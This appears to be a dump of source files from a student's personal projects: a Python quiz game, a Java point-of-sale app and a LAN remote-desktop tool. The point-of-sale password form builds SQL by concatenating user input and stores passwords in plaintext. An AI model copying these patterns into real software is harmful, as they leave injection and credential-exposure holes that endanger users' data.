PhotoImage(file=\"img/play1.png\")\n pic_quit = PhotoImage(file=\"img/quit1.png\")\n bt_logo = ttk.Button(self.pannel2, image=pic_play, width=60,command=self.play_game)\n bt_rules = ttk.Button(self.pannel2, image=pic_quit, command=self.exit, width=60)\n\n\n bt_logo.pack(pady=10)\n bt_rules.pack(pady=10)\n\n\n self.root.mainloop()\n#-----------------------------------------------------------\n# obj = kbc2()\nif __name__ == '__main__':\n kbc2()\n"
},
{
"alpha_fraction": 0.5683296918869019,
"alphanum_fraction": 0.5699566006660461,
"avg_line_length": 26.84375,
"blob_id": "c1994b716874ac6f1325113b3eb8657bb78a0c16",
"content_id": "7d413ca47a8e2fa6cceba00832d7fc9e0528297c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1844,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 64,
"path": "/TeamViewer/screenshot.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "import java.awt.AWTException;\r\nimport java.awt.Rectangle;\r\nimport java.awt.Robot;\r\nimport java.awt.Toolkit;\r\nimport java.awt.image.BufferedImage;\r\nimport java.io.File;\r\nimport java.io.IOException;\r\nimport java.util.logging.Level;\r\nimport java.util.logging.Logger;\r\nimport javax.imageio.ImageIO;\r\n\r\n/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\n\r\n/**\r\n *\r\n * @author vedantmahajan\r\n */\r\npublic class screenshot {\r\n \r\n \r\n public static void main(String[] args) \r\n {\r\n \r\n \r\n { \r\n try { \r\n Thread.sleep(120);\r\n } catch (InterruptedException ex) {\r\n Logger.getLogger(screenshot.class.getName()).log(Level.SEVERE, null, ex);\r\n }\r\n Robot r = null; \r\n try {\r\n r = new Robot();\r\n } catch (AWTException ex) {\r\n Logger.getLogger(screenshot.class.getName()).log(Level.SEVERE, null, ex);\r\n }\r\n \r\n // It saves screenshot to desired path \r\n String path = \"src/pics/screenshot.jpg\"; \r\n \r\n // Used to get ScreenSize and capture image \r\n Rectangle capture = \r\n new Rectangle(Toolkit.getDefaultToolkit().getScreenSize()); \r\n BufferedImage Image = r.createScreenCapture(capture); \r\n try { \r\n ImageIO.write(Image, \"jpg\", new File(path));\r\n } catch (IOException ex) {\r\n Logger.getLogger(screenshot.class.getName()).log(Level.SEVERE, null, ex);\r\n }\r\n System.out.println(\"Screenshot saved\"); \r\n } \r\n \r\n }\r\n \r\n \r\n// catch (AWTException | IOException | InterruptedException ex) { \r\n// System.out.println(ex); \r\n// } \r\n \r\n}"
},
{
"alpha_fraction": 0.6156436204910278,
"alphanum_fraction": 0.632478654384613,
"avg_line_length": 37.60499954223633,
"blob_id": "fea9e270aee9079da57ad3d9aaa8c62f83259e52",
"content_id": "8e8c70a13929fc6bbad699d7fdaf9856b9702f16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7722,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 200,
"path": "/Point_Of_Sale-in_java/src/changepass.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.swing.JOptionPane;\nimport sun.security.util.Password;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n\n/**\n *\n * @author vedantmahajan\n */\npublic class changepass extends javax.swing.JFrame {\n\n String global_username;\n \n /**\n * Creates new form changepass\n */\n public changepass(String global_username) {\n initComponents();\n \n this.global_username = this.global_username;\n \n setSize(500,500);\n \n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n jLabel2 = new javax.swing.JLabel();\n jLabel3 = new javax.swing.JLabel();\n jLabel4 = new javax.swing.JLabel();\n jLabel5 = new javax.swing.JLabel();\n lb_username_changepass = new javax.swing.JTextField();\n lb_oldpass = new javax.swing.JTextField();\n lb_newpass = new javax.swing.JTextField();\n lb_confirmpass = new javax.swing.JTextField();\n jButton1 = new javax.swing.JButton();\n\n jLabel1.setText(\"jLabel1\");\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel2.setText(\"USERNAME :\");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(40, 40, 110, 16);\n\n jLabel3.setText(\"OLD PASSWORD :\");\n getContentPane().add(jLabel3);\n jLabel3.setBounds(40, 100, 130, 16);\n\n jLabel4.setText(\"NEW PASSWORD :\");\n getContentPane().add(jLabel4);\n jLabel4.setBounds(40, 160, 120, 16);\n\n jLabel5.setText(\"CONFIRM PASSWORD :\");\n getContentPane().add(jLabel5);\n jLabel5.setBounds(40, 210, 160, 16);\n\n lb_username_changepass.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n lb_username_changepassActionPerformed(evt);\n }\n });\n getContentPane().add(lb_username_changepass);\n lb_username_changepass.setBounds(230, 40, 110, 26);\n\n lb_oldpass.setText(\"jTextField2\");\n lb_oldpass.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n lb_oldpassActionPerformed(evt);\n }\n });\n getContentPane().add(lb_oldpass);\n lb_oldpass.setBounds(230, 90, 80, 26);\n\n lb_newpass.setText(\"jTextField3\");\n getContentPane().add(lb_newpass);\n lb_newpass.setBounds(230, 150, 80, 26);\n\n lb_confirmpass.setText(\"jTextField4\");\n getContentPane().add(lb_confirmpass);\n lb_confirmpass.setBounds(230, 210, 80, 26);\n\n jButton1.setText(\"CONFIRM\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(130, 260, 103, 29);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void lb_username_changepassActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_lb_username_changepassActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_lb_username_changepassActionPerformed\n\n private void lb_oldpassActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_lb_oldpassActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_lb_oldpassActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n \n \n \n if((lb_confirmpass.getText()).equals(lb_newpass.getText()) == false)\n {\n JOptionPane.showMessageDialog(rootPane, \"RE-CHECK PASSWORD !\");\n }\n \n else if ((lb_newpass.getText()).equals(null) || (lb_oldpass.getText()).equals(null) || (lb_confirmpass.getText()).equals(null))\n {\n JOptionPane.showMessageDialog(rootPane, \"ALL FIELDS ARE NECESSARY !\");\n }\n \n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from adminlogin where USERNAME = '\" + (lb_username_changepass.getText()) +\"' and PASSWORD = '\" + (lb_oldpass.getText()) +\"'\");\n \n try {\n if(resultset_obj.next())\n {\n resultset_obj.updateString(\"PASSWORD\", lb_confirmpass.getText());\n \n resultset_obj.updateRow();\n \n JOptionPane.showMessageDialog(rootPane, \"PASSWORD CHANGED !\");\n }\n } \n catch (SQLException ex) \n {\n Logger.getLogger(changepass.class.getName()).log(Level.SEVERE, null, ex);\n }\n \n }//GEN-LAST:event_jButton1ActionPerformed\n\n /**\n * @param args the command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(changepass.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(changepass.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(changepass.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(changepass.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n //new changepass().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel3;\n private javax.swing.JLabel jLabel4;\n private javax.swing.JLabel jLabel5;\n private javax.swing.JTextField lb_confirmpass;\n private javax.swing.JTextField lb_newpass;\n private javax.swing.JTextField lb_oldpass;\n public javax.swing.JTextField lb_username_changepass;\n // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.5387989282608032,
"alphanum_fraction": 0.5525848269462585,
"avg_line_length": 37.449798583984375,
"blob_id": "dff3b6e3845fe0116f08be19f093e65e5f6c0149",
"content_id": "a3150d790f9e110d87a5416673ee772fcd56a6af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9575,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 249,
"path": "/TeamViewer/maincontroller.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport com.mashape.unirest.http.HttpResponse;\nimport com.mashape.unirest.http.Unirest;\nimport com.mashape.unirest.http.exceptions.UnirestException;\nimport java.awt.Graphics2D;\nimport java.awt.RenderingHints;\nimport java.awt.event.MouseAdapter;\nimport java.awt.event.MouseEvent;\nimport java.awt.image.BufferedImage;\nimport java.io.File;\nimport java.io.IOException;\nimport java.util.ArrayList;\nimport java.util.StringTokenizer;\nimport java.util.concurrent.ExecutionException;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.imageio.ImageIO;\nimport javax.swing.ImageIcon;\n\n\npublic class maincontroller extends javax.swing.JFrame\n{\n\n ArrayList<PCinfo> pclist = new ArrayList<>(); //this will store store all the info about all the pc's in the network in a arraylist \n public maincontroller()\n {\n initComponents();\n setSize(500, 500);\n }\n\n \n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jButton1 = new javax.swing.JButton();\n jScrollPane1 = new javax.swing.JScrollPane();\n jPanel1 = new javax.swing.JPanel();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n setBackground(new java.awt.Color(0, 0, 153));\n getContentPane().setLayout(null);\n\n jButton1.setText(\"Connect\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(390, 30, 140, 40);\n\n jPanel1.setBackground(new java.awt.Color(102, 102, 255));\n\n javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);\n jPanel1.setLayout(jPanel1Layout);\n jPanel1Layout.setHorizontalGroup(\n jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\n .addGap(0, 868, Short.MAX_VALUE)\n );\n jPanel1Layout.setVerticalGroup(\n jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\n .addGap(0, 498, Short.MAX_VALUE)\n );\n\n jScrollPane1.setViewportView(jPanel1);\n\n getContentPane().add(jScrollPane1);\n jScrollPane1.setBounds(10, 110, 870, 500);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n detect d = new detect();\n Thread t = new Thread(d);\n t.start();\n }//GEN-LAST:event_jButton1ActionPerformed\n public class detect implements Runnable //\"implements runnable\" will convert a class into thread\n {\n\n @Override\n public void run()\n {\n int count = 1;\n for (int i=1; i<=15;i++)\n {\n Thread tarr[] = new Thread[17]; // an array of thread types so the request is generated to 17 systems at the same time to work faster\n for (int j=0; j<17; j++)\n {\n connect c = new connect(count+\"\");\n tarr[j] = new Thread(c);\n tarr[j].start(); //starts the thread\n count++;\n }\n for (int k=0; k<17;k++)\n {\n try\n {\n tarr[k].join(); // will join 17 threads used at a time\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n \n }\n }\n }\n \n \n }\n public class connect implements Runnable\n {\n String ip;\n connect(String ip)\n {\n this.ip = ip;\n }\n\n @Override\n public void run() \n {\n try\n {\n HttpResponse<String> httpres = Unirest.get(\"http://\"+crdentials.ipadd+ip+\":8888/connect\").asString();\n String res = httpres.getBody();\n if(res!=null)\n {\n StringTokenizer st = new StringTokenizer(res,\",\");\n String pcname = st.nextToken();\n String os = st.nextToken();\n \n String pic = \"\";\n if(os.contains(\"Windows\"))\n {\n pic = \"src/pics/window.png\";\n }\n else if(os.contains(\"Mac\"))\n {\n pic = \"src/pics/mac.png\";\n }\n else\n {\n pic = \"src/pics/linux.jpg\";\n }\n \n pclist.add(new PCinfo (pcname, crdentials.ipadd+ip, os, pic));\n System.out.println(pclist.size());\n createpanel();\n }\n \n System.out.println(res);\n }\n catch(Exception e)\n {\n// e.printStackTrace();\n }\n }\n \n \n }\n public void createpanel() throws IOException\n {\n jPanel1.removeAll(); //name of the panel in it sdesign. the command is if there is something already this will remove it \n jPanel1.repaint(); //this will refresh the whole panel\n int x = 10,y = 10; // these values are temporarily given the bounds of single label which we'll have to change aftrewords \n clientpanel sp[] = new clientpanel[pclist.size()]; //an array of type clientpanel(the class where one sample apnel is created)is created where the size is same as the array list\n for (int i = 0; i < pclist.size(); i++)\n {\n sp[i] = new clientpanel();\n sp[i].setBounds(x, y, 300, 250);\n sp[i].ip.setText(pclist.get(i).ip); //we are getting all the variables stored in client panel now in array\n sp[i].pcname.setText(pclist.get(i).pcname);\n String pic = pclist.get(i).photo;\n BufferedImage img = ImageIO.read(new File (pic));\n BufferedImage obj = resize(img, sp[i].jLabel3.getWidth(), sp[i].jLabel3.getHeight());\n sp[i].jLabel3.setIcon(new ImageIcon(img));\n jPanel1.add(sp[i]);\n String total_ip = pclist.get(i).ip;\n sp[i].addMouseListener(new MouseAdapter() {\n @Override\n public void mouseClicked(MouseEvent e) {\n if(e.getClickCount()== 2){\n homescreen obj = new homescreen(total_ip);\n obj.setVisible(true);\n }\n \n }\n \n });\n x = x+350;\n if(x>1000)\n {\n y = y+270;\n }\n jPanel1.repaint();\n \n }\n }\n public static BufferedImage resize(BufferedImage img, int newW, int newH) { \n int w = img.getWidth(); \n int h = img.getHeight(); \n BufferedImage dimg = new BufferedImage(newW, newH, img.getType()); \n Graphics2D g = dimg.createGraphics(); \n g.setRenderingHint(RenderingHints.KEY_INTERPOLATION,\n RenderingHints.VALUE_INTERPOLATION_BILINEAR); \n g.drawImage(img, 0, 0, newW, newH, 0, 0, w, h, null); \n g.dispose(); \n return dimg; \n}\n \n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(maincontroller.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(maincontroller.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(maincontroller.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(maincontroller.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n new maincontroller().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JPanel jPanel1;\n private javax.swing.JScrollPane jScrollPane1;\n // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.8026315569877625,
"alphanum_fraction": 0.8026315569877625,
"avg_line_length": 56,
"blob_id": "0aac7526d1bc54aaee89f53f65bc3380ad2abcdb",
"content_id": "f7866813e70491fcb5d77a7118d415a6254a3e43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 230,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 4,
"path": "/TeamViewer/README.md",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "# Team Viewer\n\nRemote Desktop App in Java. It allows a personal computer’s desktop environment to be run remotely on one system, while being\ndisplayed on a separate client device. It is based on the popular software TeamViewer.\n"
},
{
"alpha_fraction": 0.5407989025115967,
"alphanum_fraction": 0.5502565503120422,
"avg_line_length": 36.64393997192383,
"blob_id": "13f471797818983c451d3112aba448764e305a5b",
"content_id": "2ff1ae1c1ae643d02191a36d743ae9d5271ed639",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9939,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 264,
"path": "/TeamViewer/MainScreen.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.awt.AWTException;\nimport java.awt.Image;\nimport java.awt.MenuItem;\nimport java.awt.PopupMenu;\nimport java.awt.SystemTray;\nimport java.awt.Toolkit;\nimport java.awt.TrayIcon;\nimport java.awt.event.ActionEvent;\nimport java.awt.event.ActionListener;\nimport java.awt.event.WindowAdapter;\nimport java.awt.event.WindowEvent;\nimport java.awt.event.WindowStateListener;\nimport java.io.BufferedReader;\nimport java.io.File;\nimport java.io.FileReader;\nimport javax.swing.JFrame;\nimport javax.swing.JOptionPane;\nimport javax.swing.UIManager;\n\n\npublic class MainScreen extends javax.swing.JFrame {\n \n ServerForStudents obj;\n \n serverforteamviewer obj2;\n TrayIcon trayIcon;\n SystemTray tray;\n \n public MainScreen() {\n initComponents();\n setSize(500, 500);\n \n addToSystemTray();\n \n setDefaultCloseOperation(HIDE_ON_CLOSE); \n }\n\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jButton1 = new javax.swing.JButton();\n jButton2 = new javax.swing.JButton();\n jb3 = new javax.swing.JButton();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jButton1.setText(\"Start Server\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(60, 40, 150, 30);\n\n jButton2.setText(\"Stop Server\");\n jButton2.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton2ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton2);\n jButton2.setBounds(70, 110, 140, 30);\n\n jb3.setText(\"Set passwrd\");\n jb3.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jb3ActionPerformed(evt);\n }\n });\n getContentPane().add(jb3);\n jb3.setBounds(60, 180, 160, 30);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n \n try {\n obj = new ServerForStudents(8888);\n \n obj2 = new serverforteamviewer(7777);\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n\n jButton1.setEnabled(false);\n jButton2.setEnabled(true);\n \n }//GEN-LAST:event_jButton1ActionPerformed\n\n private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton2ActionPerformed\n obj.shutdown();\n \n System.out.println(\"Server Shutdown !!!\");\n \n jButton1.setEnabled(true);\n jButton2.setEnabled(false);\n \n }//GEN-LAST:event_jButton2ActionPerformed\n\n private void jb3ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jb3ActionPerformed\n\n \n setpassword object1 = new setpassword(); \n \n object1.setVisible(true);\n \n }//GEN-LAST:event_jb3ActionPerformed\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(MainScreen.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(MainScreen.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(MainScreen.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(MainScreen.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n new MainScreen().setVisible(true);\n }\n });\n }\n\n void addToSystemTray() {\n try {\n System.out.println(\"setting look and feel\");\n UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName());\n } catch (Exception e) {\n System.out.println(\"Unable to set LookAndFeel\");\n }\n if (SystemTray.isSupported()) {\n System.out.println(\"system tray supported\");\n tray = SystemTray.getSystemTray();\n\n Image image = Toolkit.getDefaultToolkit().getImage(\"src/pics/linux.jpg\");\n ActionListener exitListener;\n exitListener = new ActionListener() {\n public void actionPerformed(ActionEvent e) {\n// String pass = \"123\";\n File f = new File(\"src/files/logindetails.txt\");\n try {\n FileReader fr = new FileReader(f);\n BufferedReader br = new BufferedReader(fr);\n// while (true) {\n String user = br.readLine();\n String pass = br.readLine();\n pass = pass.substring(pass.indexOf(\":\") + 1);\n String password = JOptionPane.showInputDialog(MainScreen.this, \"Enter password\");\n if (password.equals(pass)) {\n System.out.println(\"Exiting....\");\n System.exit(0);\n// if (br.readLine() == null) {\n// break;\n// }\n } else {\n JOptionPane.showMessageDialog(rootPane, \"Wrong password !\");\n }\n// }\n } catch (Exception ex) {\n ex.printStackTrace();\n }\n\n }\n\n };\n PopupMenu popup = new PopupMenu();\n MenuItem defaultItem = new MenuItem(\"Exit\");\n defaultItem.addActionListener(exitListener);\n popup.add(defaultItem);\n defaultItem = new MenuItem(\"Open\");\n defaultItem.addActionListener(new ActionListener() {\n public void actionPerformed(ActionEvent e) {\n setVisible(true);\n tray.remove(trayIcon);\n\n setExtendedState(JFrame.NORMAL);\n }\n });\n popup.add(defaultItem);\n trayIcon = new TrayIcon(image, \"SystemTray Demo\", popup);\n trayIcon.setImageAutoSize(true);\n } else {\n System.out.println(\"system tray not supported\");\n }\n addWindowListener(new WindowAdapter() {\n @Override\n public void windowClosing(WindowEvent e) {\n try {\n tray.add(trayIcon);\n setVisible(false);\n } catch (Exception ex) {\n ex.printStackTrace();\n }\n }\n\n });\n addWindowStateListener(new WindowStateListener() {\n @Override\n public void windowStateChanged(WindowEvent e) {\n if (e.getNewState() == ICONIFIED) {\n try {\n tray.add(trayIcon);\n } catch (AWTException ex) {\n ex.printStackTrace();\n }\n setVisible(false);\n System.out.println(\"added to SystemTray\");\n }\n if (e.getNewState() == 7) {\n try {\n tray.add(trayIcon);\n setVisible(false);\n System.out.println(\"added to SystemTray\");\n } catch (AWTException ex) {\n System.out.println(\"unable to add to system tray\");\n }\n }\n if (e.getNewState() == MAXIMIZED_BOTH) {\n tray.remove(trayIcon);\n setVisible(true);\n System.out.println(\"Tray icon removed\");\n }\n if (e.getNewState() == NORMAL) {\n tray.remove(trayIcon);\n setVisible(true);\n System.out.println(\"Tray icon removed\");\n }\n }\n });\n setIconImage(Toolkit.getDefaultToolkit().getImage(\"src/pics/linux.jpg\"));\n\n setVisible(true);\n setSize(300, 200);\n// setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n }\n \n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JButton jButton2;\n private javax.swing.JButton jb3;\n // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.7615384459495544,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 42.33333206176758,
"blob_id": "555dac5d134139860797465065cda4787c85f529",
"content_id": "6390efe6adfa89b39bbec722e62e809bf0082705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 3,
"path": "/who_wants_to_be_the_millionare/README.md",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "# WHO WANTS TO BE A MILLIONAIRE\n\nDesktop game “Who wants to be a millionaire” in Python 3 based on popular TV show using PyCharm.\n"
},
{
"alpha_fraction": 0.6078037023544312,
"alphanum_fraction": 0.629525363445282,
"avg_line_length": 35.28832244873047,
"blob_id": "50dc15be7038f1a415d6dd6f72dd017ab57064ff",
"content_id": "8b98d9745fa442ae96db0905792da3c7439be2be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9944,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 274,
"path": "/Point_Of_Sale-in_java/src/updateproduct.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.io.File;\nimport java.sql.ResultSet;\nimport java.util.Date;\nimport javax.swing.ImageIcon;\nimport javax.swing.JFileChooser;\nimport javax.swing.JOptionPane;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n/**\n *\n * @author vedantmahajan\n */\npublic class updateproduct extends javax.swing.JFrame {\n\n /**\n * Creates new form updateproduct\n */\n String pid, name, desc, bar, photo, price;\n\n public updateproduct(String pid, String name, String desc, String bar, String photo, String price) {\n initComponents();\n\n this.pid = pid;\n\n this.name = name;\n\n this.desc = desc;\n\n this.bar = bar;\n\n this.photo = photo;\n\n this.price = price;\n\n tf_update_pid.setText(pid);\n\n tf_update_name.setText(name);\n\n ta_update_desc.setText(desc);\n\n tf_update_barcode.setText(bar);\n\n lb_update_photo_path.setText(photo);\n\n tf_update_price.setText(price);\n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n jLabel2 = new javax.swing.JLabel();\n jLabel3 = new javax.swing.JLabel();\n jLabel4 = new javax.swing.JLabel();\n jLabel5 = new javax.swing.JLabel();\n jLabel6 = new javax.swing.JLabel();\n tf_update_pid = new javax.swing.JTextField();\n tf_update_name = new javax.swing.JTextField();\n tf_update_barcode = new javax.swing.JTextField();\n lb_update_photo = new javax.swing.JLabel();\n jScrollPane1 = new javax.swing.JScrollPane();\n ta_update_desc = new javax.swing.JTextArea();\n tf_update_price = new javax.swing.JTextField();\n jButton1 = new javax.swing.JButton();\n jButton2 = new javax.swing.JButton();\n lb_update_photo_path = new javax.swing.JLabel();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel1.setText(\"PID\");\n getContentPane().add(jLabel1);\n jLabel1.setBounds(50, 40, 21, 16);\n\n jLabel2.setText(\"NAME\");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(50, 110, 37, 16);\n\n jLabel3.setText(\"DESCRIPTION\");\n getContentPane().add(jLabel3);\n jLabel3.setBounds(50, 170, 130, 16);\n\n 